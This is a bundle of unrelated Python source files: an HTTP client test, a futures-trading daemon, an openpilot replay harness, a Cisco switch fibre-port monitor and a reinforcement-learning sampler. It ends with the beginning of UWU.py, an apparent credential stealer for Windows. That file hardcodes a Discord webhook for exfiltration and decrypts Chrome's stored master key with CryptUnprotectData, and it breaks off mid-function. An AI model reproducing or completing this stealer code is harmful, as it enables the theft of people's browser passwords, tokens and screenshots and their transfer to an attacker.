"http://c2.com/cgi/wiki?CommonLispHyperSpec",
"http://slashdot.org"
]
for url in urls:
try:
req = http.GET( url )
except Exception as e:
print("An Exception was thrown for %s" % url)
self.assertTrue( False, "An Exception was thrown for %s %s" % (url,e))
self.assertTrue(req != None, "None Returned! %s" % url)
self.assertTrue(req.code == 200 or
req.code == 301 or
req.code == 302,
"Code: %s for %s" % (req.code, url))
if (req.code == 200):
self.assertTrue(req.body.find("DOCTYPE")>=0 or
req.body.find("<body")>=0 ,
"%s Data: [%s] " % (url,req.body))
def testPOST(self):
'''Test HTTP POST with an echo server'''
MyHTTPHandler.post = echo_post
http = httpclass.HTTPClient()
path = "post_echoer"
url = "http://%s:%d/%s" % (BASEHOST,BASEPORT, path)
args = {'a':'aaaaaaaaaaaaa',
'b':'bbbbbbbbbbbbbbbbbbbbbb',
'c':'c',
'd':'012345\r67890\n2321321\n\r'}
print("Sending POST!")
req = http.POST( url, args=args )
self.assertTrue(req != None, "None Returned!")
self.assertTrue(req.code == 200)
print("Test Post Body: [%s]" % req.body)
outargs = json.loads(req.body)
print(outargs.__class__)
for key in args:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
for key in outargs:
self.assertTrue(args[key] == outargs[key][0], "Key [%s] not found" % key)
@classmethod
def tearDownClass(self):
if (TestHTTPClient.httpd!=None):
print("HTTP Shutdown in tearDown\n")
TestHTTPClient.httpd.shutdown()
TestHTTPClient.httpd.server_close()
time.sleep(1)
def test_test_webserver():
print("http://%s:%d/dsadsadsadsa\n" % (BASEHOST,BASEPORT) )
MyHTTPHandler.get = echo_path_get
MyHTTPHandler.post = echo_post
httpd = make_http_server()
try:
httpd.serve_forever()
finally:
httpd.shutdown()
if __name__ == '__main__':
unittest.main()
|
run.py
|
import multiprocessing
import sys
from time import sleep
from datetime import datetime, time
from logging import INFO
from vnpy.event import EventEngine
from vnpy.trader.setting import SETTINGS
from vnpy.trader.engine import MainEngine
from vnpy.gateway.ctp import CtpGateway
from vnpy.app.cta_strategy import CtaStrategyApp
from vnpy.app.cta_strategy.base import EVENT_CTA_LOG
SETTINGS["log.active"] = True
SETTINGS["log.level"] = INFO
SETTINGS["log.console"] = True
ctp_setting = {
"用户名": "",
"密码": "",
"经纪商代码": "",
"交易服务器": "",
"行情服务器": "",
"产品名称": "",
"授权编码": "",
"产品信息": ""
}
# Chinese futures market trading period (day/night)
DAY_START = time(8, 45)
DAY_END = time(14, 29)
NIGHT_START = time(20, 45)
NIGHT_END = time(2, 45)
def check_trading_period():
""""""
current_time = datetime.now().time()
trading = False
if (
(current_time >= DAY_START and current_time <= DAY_END)
or (current_time >= NIGHT_START)
or (current_time <= NIGHT_END)
):
trading = True
return trading
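# Worked example: at 21:30 current_time >= NIGHT_START holds, so check_trading_period()
# returns True; at 15:30 none of the three conditions hold, so it returns False.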
def run_child():
"""
Running in the child process.
"""
SETTINGS["log.file"] = True
event_engine = EventEngine()
main_engine = MainEngine(event_engine)
main_engine.add_gateway(CtpGateway)
cta_engine = main_engine.add_app(CtaStrategyApp)
main_engine.write_log("主引擎创建成功")
log_engine = main_engine.get_engine("log")
event_engine.register(EVENT_CTA_LOG, log_engine.process_log_event)
main_engine.write_log("注册日志事件监听")
main_engine.connect(ctp_setting, "CTP")
main_engine.write_log("连接CTP接口")
sleep(10)
cta_engine.init_engine()
main_engine.write_log("CTA策略初始化完成")
cta_engine.init_all_strategies()
sleep(60) # Leave enough time to complete strategy initialization
main_engine.write_log("CTA策略全部初始化")
cta_engine.start_all_strategies()
main_engine.write_log("CTA策略全部启动")
while True:
sleep(10)
trading = check_trading_period()
if not trading:
print("关闭子进程")
main_engine.close()
sys.exit(0)
def run_parent():
"""
Running in the parent process.
"""
print("启动CTA策略守护父进程")
child_process = None
while True:
trading = check_trading_period()
# Start child process in trading period
if trading and child_process is None:
print("启动子进程")
child_process = multiprocessing.Process(target=run_child)
child_process.start()
print("子进程启动成功")
# Exit the child process outside of the trading period
if not trading and child_process is not None:
if not child_process.is_alive():
child_process = None
print("子进程关闭成功")
sleep(5)
if __name__ == "__main__":
run_parent()
|
process_replay.py
|
#!/usr/bin/env python3
import importlib
import os
import sys
import threading
import time
import signal
from collections import namedtuple
import capnp
from tqdm import tqdm
import cereal.messaging as messaging
from cereal import car, log
from cereal.services import service_list
from common.params import Params
from common.timeout import Timeout
from selfdrive.car.fingerprints import FW_VERSIONS
from selfdrive.car.car_helpers import get_car, interfaces
from selfdrive.manager.process import PythonProcess
from selfdrive.manager.process_config import managed_processes
# Numpy gives different results based on CPU features after version 19
NUMPY_TOLERANCE = 1e-7
CI = "CI" in os.environ
TIMEOUT = 15
ProcessConfig = namedtuple('ProcessConfig', ['proc_name', 'pub_sub', 'ignore', 'init_callback', 'should_recv_callback', 'tolerance', 'fake_pubsubmaster'])
def wait_for_event(evt):
if not evt.wait(TIMEOUT):
if threading.currentThread().getName() == "MainThread":
# tested process likely died. don't let test just hang
raise Exception("Timeout reached. Tested process likely crashed.")
else:
# done testing this process, let it die
sys.exit(0)
class FakeSocket:
def __init__(self, wait=True):
self.data = []
self.wait = wait
self.recv_called = threading.Event()
self.recv_ready = threading.Event()
def receive(self, non_blocking=False):
if non_blocking:
return None
if self.wait:
self.recv_called.set()
wait_for_event(self.recv_ready)
self.recv_ready.clear()
return self.data.pop()
def send(self, data):
if self.wait:
wait_for_event(self.recv_called)
self.recv_called.clear()
self.data.append(data)
if self.wait:
self.recv_ready.set()
def wait_for_recv(self):
wait_for_event(self.recv_called)
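# How the FakeSocket rendezvous above works: receive() signals recv_called and then
# blocks on recv_ready until the test thread has queued data via send(); send() in
# turn blocks until the tested process has called receive(), and wait_for_recv()
# lets the test wait for that call without sending anything.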
class DumbSocket:
def __init__(self, s=None):
if s is not None:
try:
dat = messaging.new_message(s)
except capnp.lib.capnp.KjException: # pylint: disable=c-extension-no-member
# lists
dat = messaging.new_message(s, 0)
self.data = dat.to_bytes()
def receive(self, non_blocking=False):
return self.data
def send(self, dat):
pass
class FakeSubMaster(messaging.SubMaster):
def __init__(self, services):
super().__init__(services, addr=None)
self.sock = {s: DumbSocket(s) for s in services}
self.update_called = threading.Event()
self.update_ready = threading.Event()
self.wait_on_getitem = False
def __getitem__(self, s):
# hack to know when fingerprinting is done
if self.wait_on_getitem:
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
return self.data[s]
def update(self, timeout=-1):
self.update_called.set()
wait_for_event(self.update_ready)
self.update_ready.clear()
def update_msgs(self, cur_time, msgs):
wait_for_event(self.update_called)
self.update_called.clear()
super().update_msgs(cur_time, msgs)
self.update_ready.set()
def wait_for_update(self):
wait_for_event(self.update_called)
class FakePubMaster(messaging.PubMaster):
def __init__(self, services): # pylint: disable=super-init-not-called
self.data = {}
self.sock = {}
self.last_updated = None
for s in services:
try:
data = messaging.new_message(s)
except capnp.lib.capnp.KjException:
data = messaging.new_message(s, 0)
self.data[s] = data.as_reader()
self.sock[s] = DumbSocket()
self.send_called = threading.Event()
self.get_called = threading.Event()
def send(self, s, dat):
self.last_updated = s
if isinstance(dat, bytes):
self.data[s] = log.Event.from_bytes(dat)
else:
self.data[s] = dat.as_reader()
self.send_called.set()
wait_for_event(self.get_called)
self.get_called.clear()
def wait_for_msg(self):
wait_for_event(self.send_called)
self.send_called.clear()
dat = self.data[self.last_updated]
self.get_called.set()
return dat
def fingerprint(msgs, fsm, can_sock, fingerprint):
print("start fingerprinting")
fsm.wait_on_getitem = True
# populate fake socket with data for fingerprinting
canmsgs = [msg for msg in msgs if msg.which() == "can"]
wait_for_event(can_sock.recv_called)
can_sock.recv_called.clear()
can_sock.data = [msg.as_builder().to_bytes() for msg in canmsgs[:300]]
can_sock.recv_ready.set()
can_sock.wait = False
# we know fingerprinting is done when controlsd sets sm['lateralPlan'].sensorValid
wait_for_event(fsm.update_called)
fsm.update_called.clear()
fsm.wait_on_getitem = False
can_sock.wait = True
can_sock.data = []
fsm.update_ready.set()
print("finished fingerprinting")
def get_car_params(msgs, fsm, can_sock, fingerprint):
if fingerprint:
CarInterface, _, _ = interfaces[fingerprint]
CP = CarInterface.get_params(fingerprint)
else:
can = FakeSocket(wait=False)
sendcan = FakeSocket(wait=False)
canmsgs = [msg for msg in msgs if msg.which() == 'can']
for m in canmsgs[:300]:
can.send(m.as_builder().to_bytes())
_, CP = get_car(can, sendcan)
Params().put("CarParams", CP.to_bytes())
def controlsd_rcv_callback(msg, CP, cfg, fsm):
# no sendcan until controlsd is initialized
socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
if "sendcan" in socks and fsm.frame < 2000:
socks.remove("sendcan")
return socks, len(socks) > 0
def radar_rcv_callback(msg, CP, cfg, fsm):
if msg.which() != "can":
return [], False
elif CP.radarOffCan:
return ["radarState", "liveTracks"], True
radar_msgs = {"honda": [0x445], "toyota": [0x19f, 0x22f], "gm": [0x474],
"chrysler": [0x2d4]}.get(CP.carName, None)
if radar_msgs is None:
raise NotImplementedError
for m in msg.can:
if m.src == 1 and m.address in radar_msgs:
return ["radarState", "liveTracks"], True
return [], False
def calibration_rcv_callback(msg, CP, cfg, fsm):
# calibrationd publishes 1 calibrationData every 5 cameraOdometry packets.
# should_recv always true to increment frame
recv_socks = []
frame = fsm.frame + 1 # incrementing hasn't happened yet in SubMaster
if frame == 0 or (msg.which() == 'cameraOdometry' and (frame % 5) == 0):
recv_socks = ["liveCalibration"]
return recv_socks, fsm.frame == 0 or msg.which() == 'cameraOdometry'
def ublox_rcv_callback(msg):
msg_class, msg_id = msg.ubloxRaw[2:4]
if (msg_class, msg_id) in {(1, 7 * 16)}:
return ["gpsLocationExternal"]
elif (msg_class, msg_id) in {(2, 1 * 16 + 5), (10, 9)}:
return ["ubloxGnss"]
else:
return []
CONFIGS = [
ProcessConfig(
proc_name="controlsd",
pub_sub={
"can": ["controlsState", "carState", "carControl", "sendcan", "carEvents", "carParams"],
"deviceState": [], "pandaStates": [], "peripheralState": [], "liveCalibration": [], "driverMonitoringState": [], "longitudinalPlan": [], "lateralPlan": [], "liveLocationKalman": [], "liveParameters": [], "radarState": [],
"modelV2": [], "driverCameraState": [], "roadCameraState": [], "ubloxRaw": [], "managerState": [],
},
ignore=["logMonoTime", "valid", "controlsState.startMonoTime", "controlsState.cumLagMs"],
init_callback=fingerprint,
should_recv_callback=controlsd_rcv_callback,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="radard",
pub_sub={
"can": ["radarState", "liveTracks"],
"liveParameters": [], "carState": [], "modelV2": [],
},
ignore=["logMonoTime", "valid", "radarState.cumLagMs"],
init_callback=get_car_params,
should_recv_callback=radar_rcv_callback,
tolerance=None,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="plannerd",
pub_sub={
"modelV2": ["lateralPlan", "longitudinalPlan"],
"carState": [], "controlsState": [], "radarState": [],
},
ignore=["logMonoTime", "valid", "longitudinalPlan.processingDelay", "longitudinalPlan.solverExecutionTime", "lateralPlan.solverExecutionTime"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="calibrationd",
pub_sub={
"carState": ["liveCalibration"],
"cameraOdometry": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=calibration_rcv_callback,
tolerance=None,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="dmonitoringd",
pub_sub={
"driverState": ["driverMonitoringState"],
"liveCalibration": [], "carState": [], "modelV2": [], "controlsState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="locationd",
pub_sub={
"cameraOdometry": ["liveLocationKalman"],
"sensorEvents": [], "gpsLocationExternal": [], "liveCalibration": [], "carState": [],
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=False,
),
ProcessConfig(
proc_name="paramsd",
pub_sub={
"liveLocationKalman": ["liveParameters"],
"carState": []
},
ignore=["logMonoTime", "valid"],
init_callback=get_car_params,
should_recv_callback=None,
tolerance=NUMPY_TOLERANCE,
fake_pubsubmaster=True,
),
ProcessConfig(
proc_name="ubloxd",
pub_sub={
"ubloxRaw": ["ubloxGnss", "gpsLocationExternal"],
},
ignore=["logMonoTime"],
init_callback=None,
should_recv_callback=ublox_rcv_callback,
tolerance=None,
fake_pubsubmaster=False,
),
]
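# A minimal usage sketch (assumed caller-side names, not defined in this file): pick a
# config and replay a list of logged messages through it, e.g.
#   cfg = next(c for c in CONFIGS if c.proc_name == "controlsd")
#   lr = list(LogReader(route_segment_path))  # LogReader and the path supplied by the caller
#   new_msgs = replay_process(cfg, lr)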
def replay_process(cfg, lr, fingerprint=None):
if cfg.fake_pubsubmaster:
return python_replay_process(cfg, lr, fingerprint)
else:
return cpp_replay_process(cfg, lr, fingerprint)
def setup_env():
params = Params()
params.clear_all()
params.put_bool("OpenpilotEnabledToggle", True)
params.put_bool("Passive", False)
params.put_bool("CommunityFeaturesToggle", True)
os.environ['NO_RADAR_SLEEP'] = "1"
os.environ["SIMULATION"] = "1"
def python_replay_process(cfg, lr, fingerprint=None):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub]
pub_sockets = [s for s in cfg.pub_sub.keys() if s != 'can']
fsm = FakeSubMaster(pub_sockets)
fpm = FakePubMaster(sub_sockets)
args = (fsm, fpm)
if 'can' in list(cfg.pub_sub.keys()):
can_sock = FakeSocket()
args = (fsm, fpm, can_sock)
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
setup_env()
# TODO: remove after getting new route for civic & accord
migration = {
"HONDA CIVIC 2016 TOURING": "HONDA CIVIC 2016",
"HONDA ACCORD 2018 SPORT 2T": "HONDA ACCORD 2018",
"HONDA ACCORD 2T 2018": "HONDA ACCORD 2018",
"Mazda CX-9 2021": "MAZDA CX-9 2021",
}
if fingerprint is not None:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = fingerprint
else:
os.environ['SKIP_FW_QUERY'] = ""
os.environ['FINGERPRINT'] = ""
for msg in lr:
if msg.which() == 'carParams':
car_fingerprint = migration.get(msg.carParams.carFingerprint, msg.carParams.carFingerprint)
if len(msg.carParams.carFw) and (car_fingerprint in FW_VERSIONS):
Params().put("CarParamsCache", msg.carParams.as_builder().to_bytes())
else:
os.environ['SKIP_FW_QUERY'] = "1"
os.environ['FINGERPRINT'] = car_fingerprint
assert(type(managed_processes[cfg.proc_name]) is PythonProcess)
managed_processes[cfg.proc_name].prepare()
mod = importlib.import_module(managed_processes[cfg.proc_name].module)
thread = threading.Thread(target=mod.main, args=args)
thread.daemon = True
thread.start()
if cfg.init_callback is not None:
if 'can' not in list(cfg.pub_sub.keys()):
can_sock = None
cfg.init_callback(all_msgs, fsm, can_sock, fingerprint)
CP = car.CarParams.from_bytes(Params().get("CarParams", block=True))
# wait for started process to be ready
if 'can' in list(cfg.pub_sub.keys()):
can_sock.wait_for_recv()
else:
fsm.wait_for_update()
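  # Replay loop: every logged publisher message is either pushed onto the fake can
  # socket or queued for the fake SubMaster; when the should_recv logic decides the
  # process will produce output, the queue is delivered and the expected responses are
  # drained from the fake PubMaster with the original logMonoTime restored.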
log_msgs, msg_queue = [], []
for msg in tqdm(pub_msgs, disable=CI):
if cfg.should_recv_callback is not None:
recv_socks, should_recv = cfg.should_recv_callback(msg, CP, cfg, fsm)
else:
recv_socks = [s for s in cfg.pub_sub[msg.which()] if
(fsm.frame + 1) % int(service_list[msg.which()].frequency / service_list[s].frequency) == 0]
should_recv = bool(len(recv_socks))
if msg.which() == 'can':
can_sock.send(msg.as_builder().to_bytes())
else:
msg_queue.append(msg.as_builder())
if should_recv:
fsm.update_msgs(0, msg_queue)
msg_queue = []
recv_cnt = len(recv_socks)
while recv_cnt > 0:
m = fpm.wait_for_msg().as_builder()
m.logMonoTime = msg.logMonoTime
m = m.as_reader()
log_msgs.append(m)
recv_cnt -= m.which() in recv_socks
return log_msgs
def cpp_replay_process(cfg, lr, fingerprint=None):
sub_sockets = [s for _, sub in cfg.pub_sub.items() for s in sub] # We get responses here
pm = messaging.PubMaster(cfg.pub_sub.keys())
all_msgs = sorted(lr, key=lambda msg: msg.logMonoTime)
pub_msgs = [msg for msg in all_msgs if msg.which() in list(cfg.pub_sub.keys())]
log_msgs = []
setup_env()
managed_processes[cfg.proc_name].prepare()
managed_processes[cfg.proc_name].start()
try:
with Timeout(TIMEOUT):
while not all(pm.all_readers_updated(s) for s in cfg.pub_sub.keys()):
time.sleep(0)
# Make sure all subscribers are connected
sockets = {s: messaging.sub_sock(s, timeout=2000) for s in sub_sockets}
for s in sub_sockets:
messaging.recv_one_or_none(sockets[s])
for i, msg in enumerate(tqdm(pub_msgs, disable=False)):
pm.send(msg.which(), msg.as_builder())
resp_sockets = cfg.pub_sub[msg.which()] if cfg.should_recv_callback is None else cfg.should_recv_callback(msg)
for s in resp_sockets:
response = messaging.recv_one(sockets[s])
if response is None:
print(f"Warning, no response received {i}")
else:
response = response.as_builder()
response.logMonoTime = msg.logMonoTime
response = response.as_reader()
log_msgs.append(response)
if not len(resp_sockets): # We only need to wait if we didn't already wait for a response
while not pm.all_readers_updated(msg.which()):
time.sleep(0)
finally:
managed_processes[cfg.proc_name].signal(signal.SIGKILL)
managed_processes[cfg.proc_name].stop()
return log_msgs
|
FibrePorts.py
|
#!/isan/bin/nxpython
# -*- coding: utf-8 -*-
"""
Copyright (c) 2019 Cisco and/or its affiliates.
This software is licensed to you under the terms of the Cisco Sample
Code License, Version 1.0 (the "License"). You may obtain a copy of the
License at
https://developer.cisco.com/docs/licenses
All use of the material herein must be in accordance with the terms of
the License. All rights not expressly granted by the License are
reserved. Unless required by applicable law or agreed to separately in
writing, software distributed under the License is distributed on an "AS
IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
or implied.
"""
__author__ = "Simon Hart <sihart@cisco.com>"
################################################################
# File: FibrePorts.py
#
# Description:
# Application will look at received power levels on SFPs
# that have Digital Optical Monitoring, and will report back
# if power is being received, and thus whether fibre is connected
##################################################################
import time
import threading
import sys
import json
import re
from collections import OrderedDict
### Imports NX-OS SDK package
import nx_sdk_py
###
# Timer thread to showcase that native python threads can also
# run along with sdkThread which is also listening for NX-OS
# specific events. tmsg.event is just generating a log every 2 minutes
# to report that the application is running. Could turn this off if required
###
def timerThread(name, val):
global cliP, sdk, tmsg
count = 0
while True:
count += 1
if sdk and cliP:
print "timer kicked - sdk"
else:
print "timer ticked - not sdk"
if tmsg:
            ### Logs an event log every time the timer is kicked, once tmsg
### is initialized.
tmsg.event("FibrePorts Timer ticked - %d" % count)
time.sleep(120)
# RegEx search string to eliminate vlan, portchannel interfaces etc.
ethernet = re.compile(r'Ethernet\d.\d*')
# Configurable global threshold for received power level, in dB.
POWERLEVEL = -30
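# For example (values for illustration only): an interface whose transceiver reports an
# rx_pwr of -7.5 is above POWERLEVEL and gets flagged "FIBRE PRESENT", while one
# reporting -40.0, or with no rx_pwr field at all, is reported as "No Fibre".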
###
# Inherit from the NxCmdHandler class, define the application
# callback in 'postCliCb'. Handler Callback for Custom Cli execution.
# Returns True if the action was successful, False in case of failure.
###
class pyCmdHandler(nx_sdk_py.NxCmdHandler):
def postCliCb(self, clicmd):
### To access the global Cli Parser Obj
global cliP, ethernet, POWERLEVEL
if "show_fibre" in clicmd.getCmdName():
resp_str1 = cliP.execShowCmd("show interface brief", nx_sdk_py.R_JSON)
resp_str2 = cliP.execShowCmd("show interface transceiver details", nx_sdk_py.R_JSON)
intbriefJs = json.loads(resp_str1)
inttransJs = json.loads(resp_str2)
intdict = {}
            # Search only for Ethernet interfaces and add their state to the new
            # dictionary intdict
for i in intbriefJs["TABLE_interface"]["ROW_interface"]:
mo = (ethernet.search(i["interface"]))
try:
if mo.group() == i["interface"]:
intdict[i["interface"]] = {"state": i["state"]}
except AttributeError:
pass
#Add sfp, name, and power levels to dictionary intdict
for i in inttransJs["TABLE_interface"]["ROW_interface"]:
intdict[i["interface"]].update({"sfp": i["sfp"]})
try:
intdict[i["interface"]].update({"name": i["name"]})
intdict[i["interface"]].update({"type": i["type"]})
except KeyError:
#pass
intdict[i["interface"]].update({"name": "n\\a"})
intdict[i["interface"]].update({"type": "n\\a"})
# try:
# intdict[i["interface"]].update({"name": i["name"]})
# except KeyError:
# pass
try:
if i["rx_pwr"]:
if float(i["rx_pwr"]) > POWERLEVEL:
print i["rx_pwr"]
intdict[i["interface"]].update({"fibre": "FIBRE PRESENT"})
intdict[i["interface"]].update({"rx_pwr": i["rx_pwr"]})
else:
intdict[i["interface"]].update({"fibre": "No Fibre"})
intdict[i["interface"]].update({"rx_pwr": i["rx_pwr"]})
except KeyError:
intdict[i["interface"]].update({"fibre": "No Fibre"})
intdict[i["interface"]].update({"rx_pwr": 'N/A'})
#Print out titles
clicmd.printConsole('{:17}{:10}{:17}{:17}{:14}{:17}{:17}'.format('INTERFACE', 'STATE', 'SFP', 'FIBRE', 'POWER', 'NAME', 'TYPE\n'))
#clicmd.printConsole('{:17}{:10}{:17}{:17}{:14}'.format('INTERFACE', 'STATE', 'SFP', 'FIBRE', 'POWER\n'))
clicmd.printConsole('-' * 110)
clicmd.printConsole('\n')
#Order dictionary
ordintdict = OrderedDict(sorted(intdict.items()))
            #Print out each of the interfaces, one row per interface
for k, v in ordintdict.items():
clicmd.printConsole("{:17}{:10}{:17}{:17}{:14}{:17}{:17}\n".format(k, v["state"], v["sfp"], v["fibre"], v["rx_pwr"], v["name"],v["type"]))
#clicmd.printConsole("{:17}{:10}{:17}{:17}{:14}\n".format(k, v["state"], v["sfp"], v["fibre"], v["rx_pwr"]))
return True
### Perform all SDK related initializations in one thread.
### All SDK related activities happen here, while the main thread
### may continue to do other work. The call to startEventLoop will
### block until we break out of it by calling stopEventLoop.
def sdkThread(name, val):
global cliP, sdk, event_hdlr, tmsg, int_attr
###
# getSdkInst is the first step for any custom Application
# wanting to gain access to NXOS Infra. Without this
# NXOS infra cannot be used.
#
# NOTE:
# Perform all SDK related initializations and startEventLoop in one
# thread. The call to startEventLoop will block the thread until we
# break out of it by calling stopEventLoop.
#
# Perform other actions in a different thread.
###
sdk = nx_sdk_py.NxSdk.getSdkInst(len(sys.argv), sys.argv)
if not sdk:
return
### Set a short Application description.
sdk.setAppDesc('FibrePorts Python App')
###
# To Create & Manage Custom syslogs one must do
# getTracer() which loads the plugin to NXOS Syslog
# Infra Functionalities.
###
tmsg = sdk.getTracer()
### To log some Trace events
tmsg.event("[%s] Started service" % sdk.getAppName())
###
# To Create & Manage Custom CLI commands one must do
# getCliParser() which loads the plugin to NXOS CLI
# Infra Functionalities.
###
cliP = sdk.getCliParser()
### Construct Custom show For Fibre ports
nxcmd = cliP.newShowCmd("show_fibre", "ports")
nxcmd.updateKeyword("ports", "fibre or not")
###
# Add the command callback Handler.
# When the respective CLI commands gets configured
# the overloaded postCliCb callback will be instantiated.
###
mycmd = pyCmdHandler()
cliP.setCmdHandler(mycmd)
###
# This is important as it Adds the constructed custom configs
# to NXOS CLI Parse tree.
###
cliP.addToParseTree()
###
# startEventLoop will block the thread until we break out
# of it by calling stopEventLoop.
###
sdk.startEventLoop()
### Got here either by calling stopEventLoop() or when App
### is removed from VSH.
tmsg.event("Service Quitting...!")
### [Required] Needed for graceful exit.
nx_sdk_py.NxSdk.__swig_destroy__(sdk)
### main thread
### Global Variables
cliP = 0
sdk = 0
tmsg = 0
### create a new sdkThread to setup SDK service and handle events.
sdk_thread = threading.Thread(target=sdkThread, args=("sdkThread", 0))
sdk_thread.start()
timer_thread = threading.Thread(target=timerThread, args=("timerThread", 0))
timer_thread.daemon = True
###
# Starting timer thread. Start it after sdkThread is started so that
# any SDK specific APIs will work without any issues in timerThread.
###
timer_thread.start()
### Main thread is blocked until sdkThread exits. This keeps the
### App running and listening to NX-OS events.
sdk_thread.join()
|
agent.py
|
import multiprocessing
from utils.replay_memory import Memory
from utils.torch import *
import math
import time
import os
os.environ["OMP_NUM_THREADS"] = "1"
def collect_samples(pid, queue, env, policy, custom_reward,
mean_action, render, running_state, min_batch_size):
if pid > 0:
torch.manual_seed(torch.randint(0, 5000, (1,)) * pid)
if hasattr(env, 'np_random'):
env.np_random.seed(env.np_random.randint(5000) * pid)
if hasattr(env, 'env') and hasattr(env.env, 'np_random'):
env.env.np_random.seed(env.env.np_random.randint(5000) * pid)
log = dict()
memory = Memory()
num_steps = 0
total_reward = 0
min_reward = 1e6
max_reward = -1e6
total_c_reward = 0
min_c_reward = 1e6
max_c_reward = -1e6
num_episodes = 0
while num_steps < min_batch_size:
state = env.reset()
if running_state is not None:
state = running_state(state)
reward_episode = 0
for t in range(10000):
state_var = tensor(state).unsqueeze(0)
with torch.no_grad():
if mean_action:
action = policy(state_var)[0][0].numpy()
else:
action = policy.select_action(state_var)[0].numpy()
action = int(action) if policy.is_disc_action else action.astype(np.float64)
next_state, reward, done, _ = env.step(action)
reward_episode += reward
if running_state is not None:
next_state = running_state(next_state)
if custom_reward is not None:
reward = custom_reward(state, action)
total_c_reward += reward
min_c_reward = min(min_c_reward, reward)
max_c_reward = max(max_c_reward, reward)
mask = 0 if done else 1
memory.push(state, action, mask, next_state, reward)
if render:
env.render()
if done:
break
state = next_state
# log stats
num_steps += (t + 1)
num_episodes += 1
total_reward += reward_episode
min_reward = min(min_reward, reward_episode)
max_reward = max(max_reward, reward_episode)
log['num_steps'] = num_steps
log['num_episodes'] = num_episodes
log['total_reward'] = total_reward
log['avg_reward'] = total_reward / num_episodes
log['max_reward'] = max_reward
log['min_reward'] = min_reward
if custom_reward is not None:
log['total_c_reward'] = total_c_reward
log['avg_c_reward'] = total_c_reward / num_steps
log['max_c_reward'] = max_c_reward
log['min_c_reward'] = min_c_reward
if queue is not None:
queue.put([pid, memory, log])
else:
return memory, log
def merge_log(log_list):
log = dict()
log['total_reward'] = sum([x['total_reward'] for x in log_list])
log['num_episodes'] = sum([x['num_episodes'] for x in log_list])
log['num_steps'] = sum([x['num_steps'] for x in log_list])
log['avg_reward'] = log['total_reward'] / log['num_episodes']
log['max_reward'] = max([x['max_reward'] for x in log_list])
log['min_reward'] = min([x['min_reward'] for x in log_list])
if 'total_c_reward' in log_list[0]:
log['total_c_reward'] = sum([x['total_c_reward'] for x in log_list])
log['avg_c_reward'] = log['total_c_reward'] / log['num_steps']
log['max_c_reward'] = max([x['max_c_reward'] for x in log_list])
log['min_c_reward'] = min([x['min_c_reward'] for x in log_list])
return log
class Agent:
def __init__(self, env, policy, device, custom_reward=None, running_state=None, num_threads=1):
self.env = env
self.policy = policy
self.device = device
self.custom_reward = custom_reward
self.running_state = running_state
self.num_threads = num_threads
def collect_samples(self, min_batch_size, mean_action=False, render=False):
t_start = time.time()
to_device(torch.device('cpu'), self.policy)
thread_batch_size = int(math.floor(min_batch_size / self.num_threads))
queue = multiprocessing.Queue()
workers = []
for i in range(self.num_threads-1):
worker_args = (i+1, queue, self.env, self.policy, self.custom_reward, mean_action,
False, self.running_state, thread_batch_size)
workers.append(multiprocessing.Process(target=collect_samples, args=worker_args))
for worker in workers:
worker.start()
memory, log = collect_samples(0, None, self.env, self.policy, self.custom_reward, mean_action,
render, self.running_state, thread_batch_size)
worker_logs = [None] * len(workers)
worker_memories = [None] * len(workers)
for _ in workers:
pid, worker_memory, worker_log = queue.get()
worker_memories[pid - 1] = worker_memory
worker_logs[pid - 1] = worker_log
for worker_memory in worker_memories:
memory.append(worker_memory)
batch = memory.sample()
if self.num_threads > 1:
log_list = [log] + worker_logs
log = merge_log(log_list)
to_device(self.device, self.policy)
t_end = time.time()
log['sample_time'] = t_end - t_start
log['action_mean'] = np.mean(np.vstack(batch.action), axis=0)
log['action_min'] = np.min(np.vstack(batch.action), axis=0)
log['action_max'] = np.max(np.vstack(batch.action), axis=0)
return batch, log
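        # Usage sketch (hypothetical names, not part of this module): with a Gym-style
        # env and a policy exposing select_action()/is_disc_action, sampling looks like
        #   agent = Agent(env, policy, device=torch.device('cpu'), num_threads=4)
        #   batch, log = agent.collect_samples(min_batch_size=2048)
        #   print(log['num_episodes'], log['avg_reward'], log['sample_time'])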
|
UWU.py
|
import os
import json
import shutil
import base64
import psutil
import sqlite3
import zipfile
import requests
import subprocess
from threading import Thread
from PIL import ImageGrab
from win32crypt import CryptUnprotectData
from re import findall, match
from Crypto.Cipher import AES
config = {
'webhook': "https://discord.com/api/webhooks/959127242942865429/TQHg_QfHlCviVT5ixVpf0-93BZ10fA_yFrrS3pyT0rl8WtuLH5HHETEcU8S67MRkmUkN" #replace https://discord.com/api/webhooks/959127242942865429/TQHg_QfHlCviVT5ixVpf0-93BZ10fA_yFrrS3pyT0rl8WtuLH5HHETEcU8S67MRkmUkN with your webhook
}
class functions(object):
def getHeaders(self, token:str=None, content_type="application/json") -> dict:
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def get_master_key(self, path) -> str:
with open(path, "r", encoding="utf-8") as f:
local_state = f.read()
local_state = json.loads(local_state)
master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
master_key = master_key[5:]
master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
return master_key
def decrypt_val(self, buff, master_key) -> str:
try:
